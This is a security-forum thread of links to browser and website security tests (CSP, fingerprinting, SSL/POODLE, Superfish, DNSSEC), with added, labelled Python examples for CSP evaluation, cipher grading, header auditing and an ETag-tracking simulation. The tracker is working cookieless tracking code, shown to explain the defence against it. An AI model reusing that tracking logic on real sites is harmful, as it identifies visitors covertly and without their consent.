
In Google Chrome all four pop-up alerts were neatly blocked by CSP.
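Whether a CSP blocks a given pop-up or script is decided by a small amount of header-parsing logic, and it helps to see that logic spelled out. The following is an added example (not the SANS test page's code and not tied to any real policy) of a minimal Content-Security-Policy evaluator: it parses a policy header, applies the default-src fallback, and answers "would this inline script or this script URL be allowed?" for a hypothetical page origin and policy string. Path matching and nonces/hashes are deliberately left out.

```python
"""Minimal CSP evaluator: would this policy let a given script/style/image load?"""
from urllib.parse import urlsplit

# Directives that fall back to default-src when absent (subset of the spec's list).
FALLBACK_TO_DEFAULT = {"script-src", "img-src", "style-src", "connect-src", "frame-src"}

def parse_csp(header):
    """'default-src 'self'; script-src 'self' https://cdn.example.com' -> {directive: [sources]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy

def _host_matches(pattern, host):
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])   # *.example.com covers a.example.com, not example.com
    return pattern == host

def _source_allows(src, url, page_origin):
    """One source expression against one absolute URL (no path matching)."""
    if src == "'none'":
        return False
    if src == "'self'":
        u = urlsplit(url)
        return u.scheme + "://" + u.netloc == page_origin
    if src == "*":
        return True
    if src.startswith("'"):                 # 'unsafe-inline', nonces, hashes: not host sources
        return False
    if src.endswith(":"):                   # scheme source such as https:
        return urlsplit(url).scheme == src[:-1].lower()
    p = urlsplit(src if "://" in src else "//" + src)
    u = urlsplit(url)
    if p.scheme and p.scheme != u.scheme:
        return False
    if p.port and p.port != (u.port or {"https": 443, "http": 80}.get(u.scheme)):
        return False
    return _host_matches(p.hostname, u.hostname)

def effective_sources(policy, directive):
    """Sources governing `directive`, or None when the policy leaves it unrestricted."""
    if directive in policy:
        return policy[directive]
    if directive in FALLBACK_TO_DEFAULT:
        return policy.get("default-src")
    return None

def allows(policy, directive, page_origin, url=None):
    """url=None asks about inline content (inline <script>, onclick=, javascript: URL),
    which is only allowed when the governing directive carries 'unsafe-inline'."""
    sources = effective_sources(policy, directive)
    if sources is None:
        return True
    if url is None:
        return "'unsafe-inline'" in sources
    return any(_source_allows(s, url, page_origin) for s in sources)
```

With `default-src 'self'; script-src 'self' https://cdn.example.com` (a made-up policy) an inline `alert()` is refused because `'unsafe-inline'` is absent, a script from the CDN over https is allowed, the same script over plain http is refused (scheme mismatch), and a stylesheet from the page's own origin is allowed through the default-src fallback.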
Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2014, 12:47:22 AM
Now test your browsers adblocker: http://ads-blocker.com/testing

and top it off with this one: http://thepcspy.com/blockadblock/

and a completely other one: http://pseudo-flaw.net/content/adblock/  (checking to circumvent an adblocker - they are anti-adblocking and firefox)

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2014, 12:14:50 AM
Please, avast! friends, test your browser with Device Fingerprint here: http://noc.to/

Great tools, great info...what information my/your  browser is leaking to websites, be aware.
Every user of Ghostery will like like this site.

Damian

Title: Re: Tests and other Media topics - Etag Tracking Test
Post by: REDACTED on June 14, 2014, 09:59:16 PM
Etag Tracking - apparently not a method used or detected by Panopticlick.

 I've also known about tracking users via the use of Etags for some time now and when using any browser I tend to try to find ways to stop this from happening. That's not because it's a huge concern but just because if it's possible to block it then I see no disadvantage.

I found a site that can be used to test if your browser is trackable via the Etag method.

https://ochronus.com/tracking-without-cookies/

 There's some interesting info. With Etags blocked in my browser each visit or page refresh results in the site visit counter remaining at 1.

 If I unblock Etags it records each subsequent visit.
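The mechanism behind that visit counter is small enough to simulate end to end. The following is an added example (not the ochronus.com page's code) with constructed traffic: a server hands each new browser a random ETag, treats the `If-None-Match` header the browser sends back as a tracking id, and replies 304 so the cached copy (and with it the id) survives; a browser that withholds `If-None-Match`, which is what "blocking ETags" amounts to, gets a fresh id each time and the counter never leaves 1.

```python
"""ETag tracking simulated: server-side re-identification and the client-side defence."""
import secrets

class EtagTracker:
    """Server side: a per-browser id smuggled into the ETag instead of a cookie (constructed)."""

    def __init__(self):
        self.visits = {}   # tracking id -> number of page loads seen

    def handle(self, request_headers):
        """Return (status, response headers) for one page load."""
        tid = request_headers.get("If-None-Match", "").strip('"')
        if tid in self.visits:
            self.visits[tid] += 1
            # 304 keeps the cached copy, and with it the ETag, alive in the browser.
            return 304, {"ETag": '"%s"' % tid}
        tid = secrets.token_hex(8)
        self.visits[tid] = 1
        return 200, {"ETag": '"%s"' % tid,
                     "Cache-Control": "private, max-age=31536000"}

class Browser:
    """Client side: a normal cache, optionally refusing to replay ETags."""

    def __init__(self, send_if_none_match=True):
        self.cache = {}                     # url -> ETag of the cached copy
        self.send_if_none_match = send_if_none_match

    def request_headers(self, url):
        if self.send_if_none_match and url in self.cache:
            return {"If-None-Match": self.cache[url]}
        return {}

    def store(self, url, response_headers):
        if "ETag" in response_headers:
            self.cache[url] = response_headers["ETag"]

def visit(browser, tracker, url, times):
    """Load `url` `times` times; return the count the server holds for the id it last saw."""
    last_tid = None
    for _ in range(times):
        _status, headers = tracker.handle(browser.request_headers(url))
        browser.store(url, headers)
        last_tid = headers["ETag"].strip('"')
    return tracker.visits[last_tid]
```

Note that nothing in this exchange involves cookies or JavaScript, which is why cookie-clearing and Panopticlick-style fingerprint checks do not notice it; clearing the browser cache (or never sending `If-None-Match` to untrusted hosts) is what breaks the link.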
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2014, 01:54:02 AM
Time to test your pop-up blocking here: http://www.popuptest.com/
Courtesy of WebAttack

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 19, 2014, 10:38:51 PM
Are you aware you should always use strong enough passwords?
Would you use a site like these given below or you 'd rather not..
Test here: https://howsecureismypassword.net/
or here: https://www.grc.com/haystack.htm
Hopefully these sites aren't https-stripped, read about this threat here:
http://blog.zimperium.com/linkedin-0day-vulnerability-puts-your-data-at-risk/
link article authors: zteam

pol
Title: Re: Tests and other Media topics
Post by: MikeBCda on June 19, 2014, 11:38:02 PM
Please, avast! friends, test your browser with Device Fingerprint here: http://noc.to/

Great tools, great info...what information my/your  browser is leaking to websites, be aware.
Every user of Ghostery will like like this site.

Damian
Mostly accurate, but some of their info is way out of date.  They show my ISP provider as Golden Triangle, which was bought out by Execulink something like 5 or 6 years ago ... the "Golden" name hasn't been used since then with one exception:  they retained the golden.net domain strictly for email, so users wouldn't have to change their addys.
(Edit) Was all but that first bit from me one sentence?? Sorry about that.  :-[
Title: Re: Tests and other Media topics
Post by: polonus on June 20, 2014, 06:28:35 PM
Hi MikeBCda,

Well the geolocation coordinates are precise and that means they can very precisely pinpoint your wifi router connection or your smartphone location etc. Without the geo-location active they cannot get further than the ISP access point wherever that may be. Nevertheless your transparency is growing the better and more refined device fingerprinting becomes.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 27, 2014, 12:33:51 PM
Check your IP space for Open Resolver Threat: http://openresolverproject.org/search2.cgi?botnet=yessir&search_for=  (enter your IP)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 29, 2014, 04:49:28 PM
See: http://www.nlnetlabs.nl/projects/dnssec-trigger/
Dnssec-trigger reconfigures the local unbound DNS server. This unbound DNS server performs DNSSEC validation, but dnssec-trigger will signal it to use the DHCP obtained forwarders if possible, and fall back to doing its own AUTH queries if that fails, and if that fails prompt the user via dnssec-trigger-applet with the option to go with insecure DNS only.

This software is experimental at this time.
Info & link credits and go to "Erwtensoep".

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 04, 2014, 12:39:00 AM
Learn more about your browser here: http://www.browserleaks.com/flash

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 07, 2014, 05:26:36 PM
For those who want to know: https://www.eff.org/https-everywhere/atlas/index.html
Example: https://www.eff.org/https-everywhere/atlas/domains/avast.com.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 14, 2014, 12:08:10 PM
Perform this drive-by-download check: http://www.amtso.org/feature-settings-check-drive-by-download.html

polonus
Title: Re: Tests and other Media topics
Post by: Asyn on August 14, 2014, 12:36:01 PM
Perform this drive-by-download check: http://www.amtso.org/feature-settings-check-drive-by-download.html

polonus
Why..!? We're covered. :)
Title: Re: Tests and other Media topics
Post by: polonus on August 28, 2014, 04:19:37 PM
OK problems with your domain, check using Domain Doctor.
An example: https://manage.centralnic.com/support/domain_doctor/superfactura.com.ar

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 07, 2014, 02:17:52 PM
Test here is free: https://www.wormly.com/test_ssl
and here: https://www.ssllabs.com/ssltest/

(Mind you, result data cannot be used online, as you cannot use this specific information against any online entity; this is/may not be allowed under the present law of certain countries without explicit, previously given written consent, or just for non-public educational and research purposes, which should not be revealed.)

Why scan? Well, read here:
https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla

Also test your client security here: https://www.howsmyssl.com/  (mine is OK)
Quote
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
TLS_ECDHE_RSA_WITH_RC4_128_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
TLS_DHE_DSS_WITH_AES_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
TLS_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_RC4_128_MD5

enjoy, my friends, enjoy,

polonus
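The howsmyssl list above mixes modern AEAD suites with RC4, 3DES and MD5 ones. The following added example (not howsmyssl's code nor the poster's; the grading rules are my own summary of well-known weaknesses) grades each suite in that list and counts what a client should stop offering:

```python
"""Grade the cipher suites a client offers, as reported by howsmyssl.com.
Added example for this thread, not howsmyssl's code nor the poster's; the
suite list is the one quoted in the post, the grading rules are my own
summary of well-known weaknesses (RC4, 3DES, MD5, no forward secrecy)."""
from dataclasses import dataclass, field
from typing import Dict, List

# The client offer quoted in the post above (2014-era browser).
OFFERED_SUITES = [
    "TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256",
    "TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256",
    "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA",
    "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
    "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
    "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",
    "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA",
    "TLS_ECDHE_RSA_WITH_RC4_128_SHA",
    "TLS_DHE_RSA_WITH_AES_128_CBC_SHA",
    "TLS_DHE_DSS_WITH_AES_128_CBC_SHA",
    "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
    "TLS_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_RSA_WITH_AES_128_CBC_SHA",
    "TLS_RSA_WITH_AES_256_CBC_SHA",
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    "TLS_RSA_WITH_RC4_128_SHA",
    "TLS_RSA_WITH_RC4_128_MD5",
]


@dataclass
class SuiteVerdict:
    name: str
    forward_secrecy: bool   # ephemeral (EC)DH key exchange
    aead: bool              # GCM or ChaCha20-Poly1305, no MAC-then-encrypt
    issues: List[str] = field(default_factory=list)

    @property
    def grade(self) -> str:
        if self.issues:
            return "weak"      # contains a broken or deprecated primitive
        if self.forward_secrecy and self.aead:
            return "modern"
        return "legacy"        # CBC+HMAC-SHA1 and/or static RSA key exchange


def classify_suite(name: str) -> SuiteVerdict:
    """Split an IANA-style suite name into key exchange and cipher/MAC parts
    and flag primitives that are known to be broken or deprecated."""
    if not name.startswith("TLS_") or "_WITH_" not in name:
        raise ValueError(f"not a TLS cipher suite name: {name}")
    kx, cipher_mac = name[len("TLS_"):].split("_WITH_", 1)
    verdict = SuiteVerdict(
        name,
        forward_secrecy=kx.startswith(("ECDHE_", "DHE_")),
        aead="_GCM_" in cipher_mac or "CHACHA20_POLY1305" in cipher_mac,
    )
    if "RC4" in cipher_mac:
        verdict.issues.append("RC4 keystream biases (RFC 7465 prohibits RC4 in TLS)")
    if "3DES" in cipher_mac:
        verdict.issues.append("3DES 64-bit block: birthday-bound attacks on long sessions")
    if cipher_mac.endswith("_MD5"):
        verdict.issues.append("MD5-based MAC")
    return verdict


def summarize(suites: List[str]) -> Dict[str, int]:
    """Count how many offered suites fall into each grade."""
    counts = {"modern": 0, "legacy": 0, "weak": 0}
    for name in suites:
        counts[classify_suite(name).grade] += 1
    return counts


def weak_suites(suites: List[str]) -> List[str]:
    """The suites a client should stop offering, with the reason for each."""
    return [f"{v.name}: {'; '.join(v.issues)}"
            for v in map(classify_suite, suites) if v.issues]


if __name__ == "__main__":
    for v in map(classify_suite, OFFERED_SUITES):
        extra = f"  [{'; '.join(v.issues)}]" if v.issues else ""
        print(f"{v.grade:7} {v.name}{extra}")
    print(summarize(OFFERED_SUITES))
```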
Title: Re: Tests and other Media topics
Post by: polonus on September 07, 2014, 02:44:35 PM
Here is where you can also check for weak keys (blacklisted): http://certlogik.com/ssl-checker/
Example: -http://certlogik.com/ssl-checker/forum.avast.com/summary

pol
Title: Re: Tests and other Media topics
Post by: polonus on September 08, 2014, 01:24:38 PM
Can this free tool be used next to avast! ?

https://www.gdata.nl/nl-usb-keyboard-guard

Protects a PC against manipulated pendrives/USB-sticks.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 16, 2014, 01:03:36 PM
Has your site or mail been compromised or are you one of the lucky ones?
Test here: https://haveibeenpwned.com/PwnedWebsites
https://haveibeenpwned.com/DomainSearch
and https://pwnedlist.com/query

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 26, 2014, 11:10:02 PM
Cookiechecker says avast forum site is OK: http://www.cookiechecker.nl/check-cookies.php?url=https://forum.avast.com/index.php
Refreshed here: http://www.cookiechecker.nl/check-cookies.php?url=https://forum.avast.com/index.php&cache=false

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 27, 2014, 05:27:30 PM
For website security testers, http security header misery and the consequences.
Test online: https://securityheaders.com/
What is being tested?
Headers We Examine
Access Control Allow Origin
Content Security Policy
Cross Domain Meta Policy
NoSniff
Server Information
Strict Transport Security
UTF-8 Character Encoding
X-Frame-Options
X-Powered-By
X-XSS-Protection

Get going, get aware, get secure!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 16, 2014, 05:28:50 PM
Test against the SSLv3 POODLE attack. When you are vulnerable you see a poodle, a Springfield terrier whenever you are safe!
Go to https://www.poodletest.com/
Firefox Users are advised to install this add-on: https://addons.mozilla.org/en-US/firefox/addon/ssl-version-control/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 28, 2014, 10:47:58 PM
Google All Over The World!
Test: http://best-seo-tools.net/googlecheck/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 09, 2014, 04:39:30 PM
Test the SSL capabilities of your browser here: https://www.ssllabs.com/ssltest/viewMyClient.html

polonus

P.S. Read on backward compatibility: http://tools.ietf.org/html/rfc2246#appendix-E
Title: Re: Tests and other Media topics
Post by: polonus on November 26, 2014, 07:14:36 PM
Hi folks, here is the online tracker tracker: https://tools.digitalmethods.net/beta/trackerTracker/       (credits Maurits Martijn)
Quote
The tool Tracker Tracker uses Ghostery to detect in a set of URLs a predefined set of 'fingerprints' of web technologies, such as social buttons and trackers, and outputs a list of technologies used per URL.

The tool Tracker Tracker can be used to make (some parts of) the 'cloud' visible.
Enjoy, my good forum friend, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 26, 2014, 07:25:32 PM
Results for example, example is raventools.com

url   scheme   host   path   type   query   aid   cid   date   patterns   objects   name   affilition
http://raventools.com   http   raventools.com      analytics      13   81   2014-11-26 19:23:36   google-analytics\.com\/(analytics\.js|urchin\.js|ga_exp\.js|ga\.js|u\/ga_debug\.js|u\/ga_beta\.js|u\/ga\.js|cx\/api\.js|collect) ; google-analytics\.com   http://www.google-analytics.com/analytics.js ; http://www.google-analytics.com/analytics.js   Google Analytics   
http://raventools.com   http   raventools.com      tracker      588   881   2014-11-26 19:23:37   cdn\.optimizely\.com\/js\/ ; optimizely\.com   http://cdn.optimizely.com/js/2185221172.js ; http://cdn.optimizely.com/js/2185221172.js   Optimizely   
http://raventools.com   http   raventools.com      widget      655   1008   2014-11-26 19:23:37   \.olark\.com

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 28, 2014, 12:14:25 AM
Does this actually work? Re: http://www.iconico.com/emailProtector/
Or is obfuscation already hopeless protection to prevent mail spam harvesting?

Anyone to comment?

polonus

P.S. Browser rendered the mail address sooner than one could say the proverbial phrase...
Another hopeless attempt: http://www.cha4mot.com/t_mailto.html

D
Title: Re: Tests and other Media topics
Post by: REDACTED on December 20, 2014, 08:39:27 AM
Does this actually work? Re: http://www.iconico.com/emailProtector/
Or is obfuscation already hopeless protection to prevent mail spam harvesting?

Anyone to comment?

polonus

P.S. Browser rendered the mail address sooner than one could say the proverbial phrase...
Another hopeless attempt: http://www.cha4mot.com/t_mailto.html

D

What I tend to use when I need a way for someone to contact me without revealing my email address:

http://xinbox.com/

If you post the URL (obfuscated in my screenshot since I don't wish to post it here) then any message gets sent to your email inbox.

You get your own URL - example: h**p://xinbox.com/polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2015, 04:19:49 PM
Test my DNS: https://www.dns-oarc.net/oarc/services/dnsentropy 
Web-based DNS check all results for me were GREAT
Some other online tests for websites: http://www.dnsinspect.com/
and http://mxtoolbox.com/ and  http://www.dnsqueries.com/en/dns_lookup.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 11, 2015, 09:04:07 AM
Nice test site for website developers: http://caniuse.com/
Does your browser support and can you use the technology?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 12, 2015, 05:30:18 PM
Test your computer IP for rogue-DNS here: https://forms.fbi.gov/check-to-see-if-your-computer-is-using-rogue-DNS#googtrans(en)
My IP is not configured to use malicious DNS-servers.
link with thanks/credits to FBI - USA v. Vladimir TSASTSIN, ET AL.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2015, 03:45:35 PM
Test for the Superfish Komodia problem on your machine!
Test is here: https://filippo.io/Badfish/

No badfish for me, probably not intercepting my connections!

How are yours?

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on February 22, 2015, 04:12:46 PM
Test for the Superfish Komodia problem on your machine!
Test is here: https://filippo.io/Badfish/ (https://filippo.io/Badfish/)

No badfish for me, probably not intercepting my connections!

How are yours?

polonus
I prefer a good steak. :) No fish on my systems either. :)
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2015, 04:28:58 PM
Hi bob3160,

Also rather have a good burger than  Komodia's "gefillte fisj"  ;)

Damian
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2015, 04:57:27 PM
But you should do that test, as others/malcreants can now also intercept Superfish encrypted proxy communications: http://threatpost.com/lenovo-superfish-certificate-password-cracked/111165
Good that Windows Defender removes it.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2015, 05:18:49 PM
Time to clean the crap and junk from your computer: http://www.pcworld.com/article/2141881/beat-it-bloatware-how-to-clean-the-crap-off-your-pc.html

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on February 22, 2015, 06:11:50 PM
Test for the Superfish Komodia problem on your machine!
Test is here: https://filippo.io/Badfish/

No badfish for me, probably not intercepting my connections!

I generally never bother with these tests as for the most part I have to actually let the test through NoScript and RequestPolicy. But a bigger consideration is that you have to trust the test site and you all know what a trusting sort I am NOT.
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2015, 10:26:24 PM
The test link appeared on several renowned security forums, so I very much doubt there is something fishy about it.
Else you have to dig deep down into the register to get to traces of this.
There are 5 native scripts on that test site, none of which are blocked, and only google analytics dot com.
Nothing out of the ordinary here as well: http://www.dnsinspect.com/filippo.io/1424639646 - hosted by CloudFlare.
I tested this site before I passed it on: http://fetch.scritch.org/%2Bfetch/?url=https%3A%2F%2Ffilippo.io%2FBadfish%2F&useragent=Fetch+useragent&accept_encoding=

In the case of Yes, the connection is not private: htxps://san.filippo.io/yes.js?cachekill=
and htxps://selfsigned.filippo.io/yes.js?cachekill=  &  htxps://badfish.filippo.io/yes.js?cachekill=
Could not get domain's name servers from parent servers, because it is self-signed naturally  ;D
html5shiv.js was implemented by the researchers to get results from earlier IE versions.

Security Header Status for test site - https://www.uploady.com/download/l0pdXoxI5Pi/7jjn923f6vpne2jP
Warnings on: The secure flag on cookies instructs the browser to only submit the cookie as part of requests over secure (HTTPS) connections. This prevents the cookie from being observed as plain text in transit over the network.
The HttpOnly flag instructs the browser that this cookie can only be accessed when sending an HTTP request. This prevents scripts running as part of a page from retrieving the value and is a defense against XSS attacks.
Major Warning: Data returned in web responses can be cached by user's browsers as well as by intermediate proxies. This directive instructs them not to retain the page content in order to prevent others from accessing sensitive content from these caches. But we have to trust the researcher expert's good intentions.

Again the proverb goes: "You can take a horse to the water, but you cannot make it drink!"

Damian

Manual removal of that Superfish: https://filippo.io/Badfish/removing.html
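The securityheaders.com list earlier in this thread and the cookie and cache warnings in this post are the same kind of check. As an added example (not the scanner's code; both responses are constructed, not captured from any site), this audits a raw HTTP response for those headers, the Secure/HttpOnly cookie flags and no-store caching, with the unhardened response beside a corrected one:

```python
"""Audit an HTTP response for the headers securityheaders.com examines and
for the cookie Secure/HttpOnly flags and no-store caching this post's report
warned about.  Added example, not the scanner's code; both responses below
are constructed, not captured from any real host."""
from typing import List, Tuple

Headers = List[Tuple[str, str]]

# Constructed response of a typical unhardened site (not from any real host).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.6.2\r\n"
    "X-Powered-By: PHP/5.4\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "Set-Cookie: session=abc123; Path=/\r\n"
    "Set-Cookie: prefs=dark; Path=/; Secure; HttpOnly\r\n"
    "Cache-Control: public, max-age=600\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "\r\n<html></html>"
)

# The same response with every finding below addressed (constructed).
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Security-Policy: default-src 'self'\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "Set-Cookie: session=abc123; Path=/; Secure; HttpOnly\r\n"
    "Cache-Control: no-store\r\n"
    "\r\n<html></html>"
)

# Header -> why its absence matters (from the scanner's "Headers We Examine").
EXPECTED = {
    "Content-Security-Policy": "scripts from any origin may run",
    "Strict-Transport-Security": "connection can be downgraded to plain HTTP",
    "X-Frame-Options": "page can be framed (clickjacking)",
    "X-Content-Type-Options": "browser may sniff content types (NoSniff)",
    "X-XSS-Protection": "legacy browser XSS filter not enforced",
}
LEAKY = ("Server", "X-Powered-By")   # disclose software and versions


def parse_response(raw: str) -> Headers:
    """Return (name, value) pairs; repeated headers such as Set-Cookie are kept."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:       # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs


def values(headers: Headers, name: str) -> List[str]:
    return [v for n, v in headers if n.lower() == name.lower()]


def audit_headers(headers: Headers) -> List[str]:
    findings = []
    present = {n.lower() for n, _ in headers}
    for name, why in EXPECTED.items():
        if name.lower() not in present:
            findings.append(f"missing {name}: {why}")
    for name in LEAKY:
        for v in values(headers, name):
            findings.append(f"{name} discloses '{v}'")
    for v in values(headers, "Content-Type"):
        if "charset=" in v.lower() and "utf-8" not in v.lower():
            findings.append(f"charset is not UTF-8: {v}")
    for v in values(headers, "Access-Control-Allow-Origin"):
        if v == "*":
            findings.append("Access-Control-Allow-Origin: * lets any origin read responses")
    return findings


def audit_cookies(headers: Headers) -> List[str]:
    findings = []
    for raw in values(headers, "Set-Cookie"):
        parts = [p.strip() for p in raw.split(";")]
        cookie = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {cookie} lacks Secure: sent in clear over HTTP")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie} lacks HttpOnly: readable by page scripts")
    return findings


def audit_caching(headers: Headers) -> List[str]:
    directives = {d.strip().lower()
                  for v in values(headers, "Cache-Control") for d in v.split(",")}
    if "no-store" not in directives:
        return ["Cache-Control lacks no-store: browsers and proxies may keep the page"]
    return []


def audit(raw: str) -> List[str]:
    """All findings for one raw response; an empty list means nothing flagged."""
    headers = parse_response(raw)
    return audit_headers(headers) + audit_cookies(headers) + audit_caching(headers)
```

Running `audit(WEAK_RESPONSE)` yields ten findings, `audit(HARDENED_RESPONSE)` none.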
Title: Re: Tests and other Media topics
Post by: !Donovan on February 23, 2015, 03:37:28 AM
Time to clean the crap and junk from your computer: http://www.pcworld.com/article/2141881/beat-it-bloatware-how-to-clean-the-crap-off-your-pc.html

polonus
Another reason why to choose Chrome OS over traditional OSes :D

Greets
~!Donovan
Title: Re: Tests and other Media topics
Post by: polonus on February 23, 2015, 01:41:31 PM
For one aspect DavidR is right, the SuperFish test site is vulnerable to POODLE: http://toolbar.netcraft.com/site_report/?url=https%3A%2F%2Ffilippo.io%2FBadfish
One big question as end-user - "What parties are left that we really can trust with our connections and data". From the days of the famous NSA revelations we know that we cannot put any trust anymore in Big Government and now it is shown that we cannot trust Big Commerce either. What more proof do we need - bad certificates, degraded and backdoored protocols, bad security implementations and all of this more or less done on purpose to turn the Interwebs into one enormous big monitoring and surveillance machine that dragnets all your data for whoever benefits. Anyone who wants to color another picture there is wrong or keeping up the big lie especially to themselves - the Internet, my best friends, is pn*wned big time and has been so since the turn of this century.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on February 23, 2015, 02:30:00 PM
Firefox now considers blacklisting: https://bugzilla.mozilla.org/show_bug.cgi?id=1134506

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on February 23, 2015, 03:29:12 PM
For one aspect DavidR is right, the SuperFish test site is vulnerable to POODLE: http://toolbar.netcraft.com/site_report/?url=https%3A%2F%2Ffilippo.io%2FBadfish (http://toolbar.netcraft.com/site_report/?url=https%3A%2F%2Ffilippo.io%2FBadfish)
One big question as end-user - "What parties are left that we really can trust with our connections and data". From the days of the famous NSA revelations we know that we cannot put any trust anymore in Big Government and now it is shown that we cannot trust Big Commerce either. What more proof do we need - bad certificates, degraded and backdoored protocols, bad security implementations and all of this more or less done on purpose to turn the Interwebs into one enormous big monitoring and surveillance machine that dragnets all your data for whoever benefits. Anyone who wants to color another picture there is wrong or keeping up the big lie especially to themselves - the Internet, my best friends, is pn*wned big time and has been so since the turn of this century.

Damian
There are always smoke signals but they can also be intercepted.
2 cans connected by a string might be better.
There is an old saying that states:
"In God we trust, all others pay cash." It simply means there isn't any one in this world that can really be trusted.
Any time you share with anyone, you are taking a chance on having your information shared with an unexpected party.
I go back to the days when a handshake was your bond. Now, a handshake is simply another way of spreading germs.
This world has come a long way and there have been many technological improvements.
For some things however we've also taken a giant stride backwards.

Title: Re: Tests and other Media topics
Post by: polonus on February 23, 2015, 03:54:18 PM
Hi bob3160,

I saw that all coming when I wrote this thread: https://forum.avast.com/index.php?topic=165018.0 re-read it and start to shiver, it brought us SuperFish and PrivDog and more corruption for that matter.
Just go here: http://cyh.herokuapp.com/cyh and check
Test here against POODLE: https://www.poodlescan.com/
Test here: http://toolbar.netcraft.com/site_report/
Now you will find that there is an enormous amount of https servers that are not following best policy configuration - have missing security headers - are forwarding excessive info to script kiddies and attackers or are just into shady ad-ware schemes and deals.
All that should really be trustworthy is backdoored, officially being downgraded, pn8wed grand time and no-one is stirring a finger - like the Wild West in 1871 where the sheriff was chased off by the criminals. Who is gonna speak up for the end-user?

And I have been addressing these insecurities time and time again with my website scanning in the virus and worms section. If it only could convince one webmaster or hosting party to do a better job for the security of all.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on February 26, 2015, 01:38:12 PM
A browser can check a certificate from a webserver whether it is actual and not revoked.
Is this a trusted CA? DANE helps you.
Test here: http://www.dnssec-failed.org/
and here: https://bad-sig.dane.verisignlabs.com/

Read: http://www.thesafemac.com/avasts-man-in-the-middle/
Anyone to comment on this story? Is it trustworthy info or a rant, as it is pretty much required behavior for antivirus software when they want to scan https://
Likewise settings are found with ESET and Kaspersky's, but not in a standard way.

We trust in Avast, unless we test.

Also test here: https://www.had-pilot.com/dane/danelaw.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 26, 2015, 07:08:42 PM
In the light of the spreading Super Fish Scandal, test DNSSEC: http://dnssec-debugger.verisignlabs.com/

pol
